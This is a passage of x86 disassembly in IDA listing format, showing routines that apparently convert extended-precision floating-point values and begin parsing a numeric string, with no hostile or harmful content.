		pop	ecx
		sub	ecx, edx
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ebx, [ebp+eax*4+var_20]
		mov	[ebp+var_10], ecx
		test	[ebx], edx
		jz	loc_412214
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_4121A4
; ---------------------------------------------------------------------------

loc_41219F:				; CODE XREF: sub_411F29+281j
		cmp	[ebp+eax*4+var_20], 0

loc_4121A4:				; CODE XREF: sub_411F29+274j
		jnz	short loc_4121AE
		inc	eax
		cmp	eax, 3
		jl	short loc_41219F
		jmp	short loc_412214
; ---------------------------------------------------------------------------

loc_4121AE:				; CODE XREF: sub_411F29:loc_4121A4j
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_4121C8
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_4121C8:				; CODE XREF: sub_411F29+298j
		and	[ebp+arg_0], 0
		xor	edx, edx
		sub	ecx, esi
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		lea	edi, [esi+edx]
		cmp	edi, esi
		jb	short loc_4121E4
		cmp	edi, edx
		jnb	short loc_4121EB

loc_4121E4:				; CODE XREF: sub_411F29+2B5j
		mov	[ebp+arg_0], 1

loc_4121EB:				; CODE XREF: sub_411F29+2B9j
		mov	[ecx], edi
		mov	ecx, [ebp+arg_0]
		jmp	short loc_412211
; ---------------------------------------------------------------------------

loc_4121F2:				; CODE XREF: sub_411F29+2E9j
		test	ecx, ecx
		jz	short loc_412214
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		xor	edi, edi
		cmp	esi, edx
		jb	short loc_41220A
		cmp	esi, 1
		jnb	short loc_41220D

loc_41220A:				; CODE XREF: sub_411F29+2DAj
		xor	edi, edi
		inc	edi

loc_41220D:				; CODE XREF: sub_411F29+2DFj
		mov	[ecx], esi
		mov	ecx, edi

loc_412211:				; CODE XREF: sub_411F29+2C7j
		dec	eax
		jns	short loc_4121F2

loc_412214:				; CODE XREF: sub_411F29+263j
					; sub_411F29+283j ...
		mov	ecx, [ebp+var_10]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[ebx], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_412234
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_412234:				; CODE XREF: sub_411F29+2FCj
		mov	ecx, dword_42523C
		inc	ecx
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_412255
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412255:				; CODE XREF: sub_411F29+325j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412270:				; CODE XREF: sub_411F29+372j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412270
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_4122AA:				; CODE XREF: sub_411F29+398j
		cmp	edx, eax
		jl	short loc_4122B6
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_4122BB
; ---------------------------------------------------------------------------

loc_4122B6:				; CODE XREF: sub_411F29+383j
		and	[ebp+edx*4+var_20], 0

loc_4122BB:				; CODE XREF: sub_411F29+38Bj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_4122AA

loc_4122C3:				; CODE XREF: sub_411F29+188j
		push	2
		xor	ebx, ebx
		pop	eax
		jmp	loc_412427
; ---------------------------------------------------------------------------

loc_4122CD:				; CODE XREF: sub_411F29+18Fj
		cmp	ebx, dword_425230
		mov	ecx, dword_42523C
		jl	loc_41238C
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		or	[ebp+var_20], 80000000h
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_412308
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412308:				; CODE XREF: sub_411F29+3D8j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412323:				; CODE XREF: sub_411F29+425j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412323
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41235D:				; CODE XREF: sub_411F29+44Bj
		cmp	edx, eax
		jl	short loc_412369
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41236E
; ---------------------------------------------------------------------------

loc_412369:				; CODE XREF: sub_411F29+436j
		and	[ebp+edx*4+var_20], 0

loc_41236E:				; CODE XREF: sub_411F29+43Ej
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41235D
		mov	eax, dword_425230
		mov	ecx, dword_425244
		lea	ebx, [ecx+eax]
		xor	eax, eax
		inc	eax
		jmp	loc_412427
; ---------------------------------------------------------------------------

loc_41238C:				; CODE XREF: sub_411F29+3B0j
		mov	eax, dword_425244
		and	[ebp+var_20], 7FFFFFFFh
		add	ebx, eax
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_4123B4
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4123B4:				; CODE XREF: sub_411F29+484j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	esi, 0FFFFFFFFh
		mov	ecx, edx
		shl	esi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	esi

loc_4123CF:				; CODE XREF: sub_411F29+4D4j
		mov	ecx, [ebp+arg_0]
		mov	edi, [ebp+ecx*4+var_20]
		mov	ecx, edi
		and	ecx, esi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	edi, [ebp+var_C]
		mov	[ebp+ecx*4+var_20], edi
		mov	edi, [ebp+var_10]
		mov	ecx, [ebp+var_4]
		shl	edi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], edi
		jl	short loc_4123CF
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41240C:				; CODE XREF: sub_411F29+4FAj
		cmp	edx, eax
		jl	short loc_412418
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41241D
; ---------------------------------------------------------------------------

loc_412418:				; CODE XREF: sub_411F29+4E5j
		and	[ebp+edx*4+var_20], 0

loc_41241D:				; CODE XREF: sub_411F29+4EDj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41240C
		xor	eax, eax

loc_412427:				; CODE XREF: sub_411F29+39Fj
					; sub_411F29+45Ej
		pop	esi

loc_412428:				; CODE XREF: sub_411F29+55j
					; sub_411F29+65j
		push	1Fh
		pop	ecx
		sub	ecx, dword_42523C
		shl	ebx, cl
		mov	ecx, [ebp+var_14]
		neg	ecx
		sbb	ecx, ecx
		and	ecx, 80000000h
		or	ebx, ecx
		mov	ecx, dword_425240
		or	ebx, [ebp+var_20]
		cmp	ecx, 40h
		jnz	short loc_41245D
		mov	ecx, [ebp+arg_4]
		mov	edx, [ebp+var_1C]
		mov	[ecx+4], ebx
		mov	[ecx], edx
		jmp	short loc_412467
; ---------------------------------------------------------------------------

loc_41245D:				; CODE XREF: sub_411F29+525j
		cmp	ecx, 20h
		jnz	short loc_412467
		mov	ecx, [ebp+arg_4]
		mov	[ecx], ebx

loc_412467:				; CODE XREF: sub_411F29+532j
					; sub_411F29+537j
		pop	edi
		pop	ebx
		leave
		retn
sub_411F29	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41246B	proc near		; CODE XREF: sub_411B13+44p

var_2C		= byte ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, [ebp+arg_0]
		movzx	ecx, word ptr [eax+0Ah]
		push	ebx
		mov	ebx, ecx
		and	ecx, 8000h
		mov	[ebp+var_14], ecx
		mov	ecx, [eax+6]
		mov	[ebp+var_20], ecx
		mov	ecx, [eax+2]
		movzx	eax, word ptr [eax]
		and	ebx, 7FFFh
		sub	ebx, 3FFFh
		shl	eax, 10h
		cmp	ebx, 0FFFFC001h
		push	edi
		mov	[ebp+var_1C], ecx
		mov	[ebp+var_18], eax
		jnz	short loc_4124D5
		xor	ebx, ebx
		xor	eax, eax

loc_4124B2:				; CODE XREF: sub_41246B+51j
		cmp	[ebp+eax*4+var_20], ebx
		jnz	short loc_4124C5
		inc	eax
		cmp	eax, 3
		jl	short loc_4124B2
		xor	eax, eax
		jmp	loc_41296A
; ---------------------------------------------------------------------------

loc_4124C5:				; CODE XREF: sub_41246B+4Bj
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		push	2
		stosd
		pop	eax
		jmp	loc_41296A
; ---------------------------------------------------------------------------

loc_4124D5:				; CODE XREF: sub_41246B+41j
		and	[ebp+arg_0], 0
		push	esi
		lea	esi, [ebp+var_20]
		lea	edi, [ebp+var_2C]
		movsd
		movsd
		movsd
		mov	esi, dword_425250
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_10], ebx
		mov	[ebp+var_C], eax
		jns	short loc_41250D
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_41250D:				; CODE XREF: sub_41246B+9Bj
		lea	edi, [ebp+eax*4+var_20]
		push	1Fh
		xor	eax, eax
		pop	ecx
		sub	ecx, edx
		inc	eax
		shl	eax, cl
		mov	[ebp+var_8], ecx
		test	[edi], eax
		jz	loc_4125B3
		mov	eax, [ebp+var_C]
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_41253B
; ---------------------------------------------------------------------------

loc_412536:				; CODE XREF: sub_41246B+D6j
		cmp	[ebp+eax*4+var_20], 0

loc_41253B:				; CODE XREF: sub_41246B+C9j
		jnz	short loc_412545
		inc	eax
		cmp	eax, 3
		jl	short loc_412536
		jmp	short loc_4125B3
; ---------------------------------------------------------------------------

loc_412545:				; CODE XREF: sub_41246B:loc_41253Bj
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_41255F
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_41255F:				; CODE XREF: sub_41246B+EDj
		and	[ebp+var_4], 0
		sub	ecx, esi
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		add	esi, edx
		mov	[ebp+arg_0], esi
		mov	esi, [ecx]
		cmp	[ebp+arg_0], esi
		jb	short loc_41259E
		cmp	[ebp+arg_0], edx
		jmp	short loc_41259C
; ---------------------------------------------------------------------------

loc_412581:				; CODE XREF: sub_41246B+143j
		test	ecx, ecx
		jz	short loc_4125B0
		and	[ebp+var_4], 0
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		cmp	esi, edx
		mov	[ebp+arg_0], esi
		jb	short loc_41259E
		cmp	esi, 1

loc_41259C:				; CODE XREF: sub_41246B+114j
		jnb	short loc_4125A5

loc_41259E:				; CODE XREF: sub_41246B+10Fj
					; sub_41246B+12Cj
		mov	[ebp+var_4], 1

loc_4125A5:				; CODE XREF: sub_41246B:loc_41259Cj
		dec	eax
		mov	edx, [ebp+arg_0]
		mov	[ecx], edx
		mov	ecx, [ebp+var_4]
		jns	short loc_412581

loc_4125B0:				; CODE XREF: sub_41246B+118j
		mov	[ebp+arg_0], ecx

loc_4125B3:				; CODE XREF: sub_41246B+B5j
					; sub_41246B+D8j
		mov	ecx, [ebp+var_8]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[edi], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_4125D3
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_4125D3:				; CODE XREF: sub_41246B+159j
		cmp	[ebp+arg_0], 0
		jz	short loc_4125DA
		inc	ebx

loc_4125DA:				; CODE XREF: sub_41246B+16Cj
		mov	eax, dword_42524C
		mov	ecx, eax
		sub	ecx, dword_425250
		cmp	ebx, ecx
		jge	short loc_4125F8
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		jmp	loc_412805
; ---------------------------------------------------------------------------

loc_4125F8:				; CODE XREF: sub_41246B+17Ej
		cmp	ebx, eax
		jg	loc_41280F
		sub	eax, [ebp+var_10]
		lea	esi, [ebp+var_2C]
		mov	ecx, eax
		lea	edi, [ebp+var_20]
		movsd
		cdq
		and	edx, 1Fh
		add	eax, edx
		movsd
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		movsd
		jns	short loc_412626
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412626:				; CODE XREF: sub_41246B+1B4j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412641:				; CODE XREF: sub_41246B+201j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412641
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41267B:				; CODE XREF: sub_41246B+227j
		cmp	edx, eax
		jl	short loc_412687
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41268C
; ---------------------------------------------------------------------------

loc_412687:				; CODE XREF: sub_41246B+212j
		and	[ebp+edx*4+var_20], 0

loc_41268C:				; CODE XREF: sub_41246B+21Aj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41267B
		mov	esi, dword_425250
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_C], eax
		jns	short loc_4126BB
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4126BB:				; CODE XREF: sub_41246B+249j
		push	1Fh
		pop	ecx
		sub	ecx, edx
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ebx, [ebp+eax*4+var_20]
		mov	[ebp+var_10], ecx
		test	[ebx], edx
		jz	loc_412756
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_4126E6
; ---------------------------------------------------------------------------

loc_4126E1:				; CODE XREF: sub_41246B+281j
		cmp	[ebp+eax*4+var_20], 0

loc_4126E6:				; CODE XREF: sub_41246B+274j
		jnz	short loc_4126F0
		inc	eax
		cmp	eax, 3
		jl	short loc_4126E1
		jmp	short loc_412756
; ---------------------------------------------------------------------------

loc_4126F0:				; CODE XREF: sub_41246B:loc_4126E6j
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_41270A
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_41270A:				; CODE XREF: sub_41246B+298j
		and	[ebp+arg_0], 0
		xor	edx, edx
		sub	ecx, esi
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		lea	edi, [esi+edx]
		cmp	edi, esi
		jb	short loc_412726
		cmp	edi, edx
		jnb	short loc_41272D

loc_412726:				; CODE XREF: sub_41246B+2B5j
		mov	[ebp+arg_0], 1

loc_41272D:				; CODE XREF: sub_41246B+2B9j
		mov	[ecx], edi
		mov	ecx, [ebp+arg_0]
		jmp	short loc_412753
; ---------------------------------------------------------------------------

loc_412734:				; CODE XREF: sub_41246B+2E9j
		test	ecx, ecx
		jz	short loc_412756
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		xor	edi, edi
		cmp	esi, edx
		jb	short loc_41274C
		cmp	esi, 1
		jnb	short loc_41274F

loc_41274C:				; CODE XREF: sub_41246B+2DAj
		xor	edi, edi
		inc	edi

loc_41274F:				; CODE XREF: sub_41246B+2DFj
		mov	[ecx], esi
		mov	ecx, edi

loc_412753:				; CODE XREF: sub_41246B+2C7j
		dec	eax
		jns	short loc_412734

loc_412756:				; CODE XREF: sub_41246B+263j
					; sub_41246B+283j ...
		mov	ecx, [ebp+var_10]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[ebx], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_412776
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_412776:				; CODE XREF: sub_41246B+2FCj
		mov	ecx, dword_425254
		inc	ecx
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_412797
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412797:				; CODE XREF: sub_41246B+325j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_4127B2:				; CODE XREF: sub_41246B+372j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_4127B2
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_4127EC:				; CODE XREF: sub_41246B+398j
		cmp	edx, eax
		jl	short loc_4127F8
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_4127FD
; ---------------------------------------------------------------------------

loc_4127F8:				; CODE XREF: sub_41246B+383j
		and	[ebp+edx*4+var_20], 0

loc_4127FD:				; CODE XREF: sub_41246B+38Bj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_4127EC

loc_412805:				; CODE XREF: sub_41246B+188j
		push	2
		xor	ebx, ebx
		pop	eax
		jmp	loc_412969
; ---------------------------------------------------------------------------

loc_41280F:				; CODE XREF: sub_41246B+18Fj
		cmp	ebx, dword_425248
		mov	ecx, dword_425254
		jl	loc_4128CE
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		or	[ebp+var_20], 80000000h
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_41284A
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_41284A:				; CODE XREF: sub_41246B+3D8j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412865:				; CODE XREF: sub_41246B+425j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412865
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41289F:				; CODE XREF: sub_41246B+44Bj
		cmp	edx, eax
		jl	short loc_4128AB
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_4128B0
; ---------------------------------------------------------------------------

loc_4128AB:				; CODE XREF: sub_41246B+436j
		and	[ebp+edx*4+var_20], 0

loc_4128B0:				; CODE XREF: sub_41246B+43Ej
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41289F
		mov	eax, dword_425248
		mov	ecx, dword_42525C
		lea	ebx, [ecx+eax]
		xor	eax, eax
		inc	eax
		jmp	loc_412969
; ---------------------------------------------------------------------------

loc_4128CE:				; CODE XREF: sub_41246B+3B0j
		mov	eax, dword_42525C
		and	[ebp+var_20], 7FFFFFFFh
		add	ebx, eax
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_4128F6
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4128F6:				; CODE XREF: sub_41246B+484j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	esi, 0FFFFFFFFh
		mov	ecx, edx
		shl	esi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	esi

loc_412911:				; CODE XREF: sub_41246B+4D4j
		mov	ecx, [ebp+arg_0]
		mov	edi, [ebp+ecx*4+var_20]
		mov	ecx, edi
		and	ecx, esi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	edi, [ebp+var_C]
		mov	[ebp+ecx*4+var_20], edi
		mov	edi, [ebp+var_10]
		mov	ecx, [ebp+var_4]
		shl	edi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], edi
		jl	short loc_412911
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41294E:				; CODE XREF: sub_41246B+4FAj
		cmp	edx, eax
		jl	short loc_41295A
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41295F
; ---------------------------------------------------------------------------

loc_41295A:				; CODE XREF: sub_41246B+4E5j
		and	[ebp+edx*4+var_20], 0

loc_41295F:				; CODE XREF: sub_41246B+4EDj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41294E
		xor	eax, eax

loc_412969:				; CODE XREF: sub_41246B+39Fj
					; sub_41246B+45Ej
		pop	esi

loc_41296A:				; CODE XREF: sub_41246B+55j
					; sub_41246B+65j
		push	1Fh
		pop	ecx
		sub	ecx, dword_425254
		shl	ebx, cl
		mov	ecx, [ebp+var_14]
		neg	ecx
		sbb	ecx, ecx
		and	ecx, 80000000h
		or	ebx, ecx
		mov	ecx, dword_425258
		or	ebx, [ebp+var_20]
		cmp	ecx, 40h
		jnz	short loc_41299F
		mov	ecx, [ebp+arg_4]
		mov	edx, [ebp+var_1C]
		mov	[ecx+4], ebx
		mov	[ecx], edx
		jmp	short loc_4129A9
; ---------------------------------------------------------------------------

loc_41299F:				; CODE XREF: sub_41246B+525j
		cmp	ecx, 20h
		jnz	short loc_4129A9
		mov	ecx, [ebp+arg_4]
		mov	[ecx], ebx

loc_4129A9:				; CODE XREF: sub_41246B+532j
					; sub_41246B+537j
		pop	edi
		pop	ebx
		leave
		retn
sub_41246B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4129AD	proc near		; CODE XREF: sub_411A6D+37p
					; sub_411B13+37p

var_7C		= dword	ptr -7Ch
var_78		= dword	ptr -78h
var_74		= dword	ptr -74h
var_70		= dword	ptr -70h
var_6C		= dword	ptr -6Ch
var_68		= dword	ptr -68h
var_64		= dword	ptr -64h
var_60		= dword	ptr -60h
var_5C		= dword	ptr -5Ch
var_58		= dword	ptr -58h
var_54		= dword	ptr -54h
var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= byte ptr -48h
var_46		= dword	ptr -46h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_32		= dword	ptr -32h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= byte ptr -20h
var_9		= byte ptr -9
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 7Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		xor	ebx, ebx
		push	esi
		xor	esi, esi
		mov	[ebp+var_7C], eax
		mov	eax, [ebp+arg_4]
		inc	esi
		xor	ecx, ecx
		cmp	[ebp+arg_1C], ebx
		push	edi
		mov	[ebp+var_70], eax
		lea	edi, [ebp+var_20]
		mov	[ebp+var_74], ebx
		mov	[ebp+var_68], esi
		mov	[ebp+var_4C], ebx
		mov	[ebp+var_58], ebx
		mov	[ebp+var_5C], ebx
		mov	[ebp+var_60], ebx
		mov	[ebp+var_64], ebx
		mov	[ebp+var_50], ebx
		mov	[ebp+var_6C], ebx
		jnz	short loc_412A15
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		xor	eax, eax
		jmp	loc_41302F
; ---------------------------------------------------------------------------

loc_412A15:				; CODE XREF: sub_4129AD+47j
		mov	edx, [ebp+arg_8]
		mov	[ebp+var_54], edx

loc_412A1B:				; CODE XREF: sub_4129AD+81j
		mov	al, [edx]
		cmp	al, 20h
		jz	short loc_412A2D
		cmp	al, 9
		jz	short loc_412A2D
		cmp	al, 0Ah
		jz	short loc_412A2D
		cmp	al, 0Dh
		jnz	short loc_412A30

loc_412A2D:				; CODE XREF: sub_4129AD+72j
					; sub_4129AD+76j ...
		inc	edx
		jmp	short loc_412A1B
; ---------------------------------------------------------------------------

loc_412A30:				; CODE XREF: sub_4129AD+7Ej
		mov	bl, 30h

loc_412A32:				; CODE XREF: sub_4129AD+A6j
					; sub_4129AD+BCj ...
		mov	al, [edx]
		inc	edx
		cmp	ecx, 0Bh	; switch 12 cases
		ja	loc_412C6D	; default
					; jumptable 00412A3E case 10
		jmp	ds:off_413041[ecx*4] ; switch jump

loc_412A45:				; DATA XREF: .text:off_413041o
		mov	cl, al		; jumptable 00412A3E case 0
		sub	cl, 31h
		cmp	cl, 8
		ja	short loc_412A55

loc_412A4F:				; CODE XREF: sub_4129AD+F7j
					; sub_4129AD+14Aj
		push	3

loc_412A51:				; CODE XREF: sub_4129AD+201j
					; sub_4129AD+218j
		pop	ecx
		dec	edx
		jmp	short loc_412A32
